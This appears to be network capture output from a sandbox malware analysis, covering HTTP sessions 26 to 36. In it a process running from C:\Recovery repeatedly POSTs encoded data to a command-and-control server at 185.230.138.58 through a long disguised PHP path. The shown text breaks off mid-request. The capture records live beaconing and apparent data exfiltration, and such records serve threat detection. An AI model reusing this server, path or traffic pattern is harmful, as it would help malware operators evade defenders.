                                                                                                                                        Dec 21, 2024 10:07:55.066431999 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:55.420157909 CET1012OUTData Raw: 57 5e 5a 5a 5f 41 54 56 5b 59 51 56 59 5e 58 51 56 5c 5d 5e 5a 5e 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W^ZZ_ATV[YQVY^XQV\]^Z^[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C,!? 2=*=* >:=\2+6+U$X$4*3*'^& X/8
                                                                                                                                        Dec 21, 2024 10:07:56.312868118 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:56.548470020 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:56 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        26192.168.2.449767185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:56.807511091 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:57.154491901 CET1012OUTData Raw: 52 52 5f 5f 5a 42 51 56 5b 59 51 56 59 59 58 51 56 5b 5d 56 5a 50 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR__ZBQV[YQVYYXQV[]VZP[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C8 ^4??^$<:[=>:W7="+?(X2%[<?T3$\''3*'^& X/$
                                                                                                                                        Dec 21, 2024 10:07:58.051028967 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:58.284256935 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:57 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        27192.168.2.449768185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:58.522933006 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1008
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:58.873334885 CET1008OUTData Raw: 57 53 5f 5a 5f 40 51 50 5b 59 51 56 59 5a 58 50 56 5b 5d 59 5a 50 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WS_Z_@QP[YQVYZXPV[]YZP[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"82#4/%Z!*[1 .%>+&8%\)*#R'X '4&$'^& X/
                                                                                                                                        Dec 21, 2024 10:07:59.770682096 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        28192.168.2.449770185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:59.807694912 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:00.154539108 CET1892OUTData Raw: 57 50 5a 58 5f 46 54 55 5b 59 51 56 59 5d 58 5e 56 58 5d 5b 5a 50 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WPZX_FTU[YQVY]X^VX][ZP[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C,_!,?2Z&=-&T#>Z*?1^6+_+0?&4"0'^& X/
                                                                                                                                        Dec 21, 2024 10:08:01.067929983 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:01.300174952 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:00 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 1e 35 43 38 0b 26 2d 20 0c 27 07 22 5b 2b 10 23 5b 24 5a 3d 40 34 0d 16 1b 3e 59 3b 5d 24 07 36 15 24 02 2c 55 28 30 3c 04 3a 0a 20 46 04 1c 20 00 3c 1d 3e 52 29 38 05 05 2d 2b 35 58 29 21 25 06 22 3c 0f 11 20 3e 08 19 34 1f 21 53 2a 3a 3e 57 3d 27 20 5a 2e 3e 07 04 22 00 23 56 0b 1f 3a 0c 2a 20 08 12 24 27 1a 1b 26 37 3d 08 23 18 3b 1a 21 0b 2b 57 21 03 2f 10 32 28 26 59 21 16 23 0c 29 2f 3e 58 32 17 05 0d 39 2d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%5C8&- '"[+#[$Z=@4>Y;]$6$,U(0<: F <>R)8-+5X)!%"< >4!S*:>W=' Z.>"#V:* $'&7=#;!+W!/2(&Y!#)/>X29-&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        29192.168.2.449771185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:59.927690029 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:00.279419899 CET1012OUTData Raw: 57 5f 5a 5c 5a 40 51 51 5b 59 51 56 59 5b 58 5a 56 52 5d 5c 5a 5b 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W_Z\Z@QQ[YQVY[XZVR]\Z[[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!-2] +Y%*-9 .:*Y \1-[<'.8Y'4:$*'^& X/,
                                                                                                                                        Dec 21, 2024 10:08:01.174508095 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:01.408255100 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:01 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        30192.168.2.449772185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:01.664483070 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:02.013839006 CET1012OUTData Raw: 57 55 5f 51 5f 49 54 52 5b 59 51 56 59 52 58 59 56 5e 5d 58 5a 5a 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WU_Q_ITR[YQVYRXYV^]XZZ[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F/T'#Z&Z6X)!7=&Z)<;2+6? 3.$6Y$:'^& X/
                                                                                                                                        Dec 21, 2024 10:08:02.910501003 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:03.144618034 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:02 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        31192.168.2.449778185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:03.380866051 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:03.732595921 CET1012OUTData Raw: 52 54 5a 5d 5a 43 54 56 5b 59 51 56 59 59 58 5b 56 5a 5d 58 5a 59 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RTZ]ZCTV[YQVYYX[VZ]XZY[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!@8" ]#?;1=-.T X6^)1?$0X<'='*'^& X/$
                                                                                                                                        Dec 21, 2024 10:08:04.628310919 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:04.860265017 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:04 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        32192.168.2.449784185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:05.101130009 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:05.451370001 CET1012OUTData Raw: 57 50 5f 5d 5f 45 51 52 5b 59 51 56 59 5b 58 59 56 59 5d 5d 5a 5a 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WP_]_EQR[YQVY[XYVY]]ZZ[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C-"'7?;Y2)=>:T7.6)(18?93>X09&*'^& X/,
                                                                                                                                        Dec 21, 2024 10:08:06.347203970 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        33192.168.2.449786185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:06.432492018 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1868
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:06.779613018 CET1868OUTData Raw: 57 51 5a 5b 5f 40 51 55 5b 59 51 56 59 58 58 5a 56 5d 5d 5a 5a 50 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQZ[_@QU[YQVYXXZV]]ZZP[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G-1#7<'Z&,:Y*>.".5+/+%Y(/S'-,3'0'^& X/
                                                                                                                                        Dec 21, 2024 10:08:07.678970098 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:07.912484884 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:07 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 13 35 25 23 54 31 3e 24 0e 30 00 22 11 28 2e 3c 06 24 3c 3a 19 20 1d 1a 5e 3e 11 0d 13 27 3d 2a 5e 27 05 28 57 3f 56 20 04 39 0a 20 46 04 1c 23 5c 28 0d 22 53 2a 06 2f 04 2f 38 2d 59 3c 22 36 14 21 02 22 00 34 2e 3d 04 20 1f 3d 19 3f 00 31 08 3d 34 20 59 2e 58 22 5b 36 10 23 56 0b 1f 39 1d 2b 23 2e 10 30 37 28 15 32 37 08 1f 23 08 3b 57 23 32 0a 08 21 3e 28 00 25 06 26 5d 21 3b 3c 56 3d 2c 3e 5a 31 39 24 54 2e 17 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%5%#T1>$0"(.<$<: ^>'=*^'(W?V 9 F#\("S*//8-Y<"6!"4.= =?1=4 Y.X"[6#V9+#.07(27#;W#2!>(%&]!;<V=,>Z19$T.&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        34192.168.2.449787185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:06.566540956 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:06.920078993 CET1012OUTData Raw: 57 51 5a 5b 5a 43 54 55 5b 59 51 56 59 5d 58 5f 56 53 5d 58 5a 51 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQZ[ZCTU[YQVY]X_VS]XZQ[@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!,Y7?_&,^*-%7-"_)/<]15Z(:7U'3''^& X/
                                                                                                                                        Dec 21, 2024 10:08:07.823915958 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:08.056799889 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:07 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        35192.168.2.449793185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:08.388258934 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:08.734594107 CET1012OUTData Raw: 57 55 5a 5a 5a 43 54 51 5b 59 51 56 59 52 58 59 56 5d 5d 5f 5a 50 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WUZZZCTQ[YQVYRXYV]]_ZP[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"82+7<8&)[&R7=>=<8185\(:/'.'$93:'^& X/
                                                                                                                                        Dec 21, 2024 10:08:09.634753942 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:09.872324944 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:09 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        36192.168.2.449799185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:10.119189978 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:10.467128992 CET1012OUTData Raw: 57 5e 5a 5a 5f 40 51 5e 5b 59 51 56 59 5d 58 50 56 5c 5d 5c 5a 5b 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
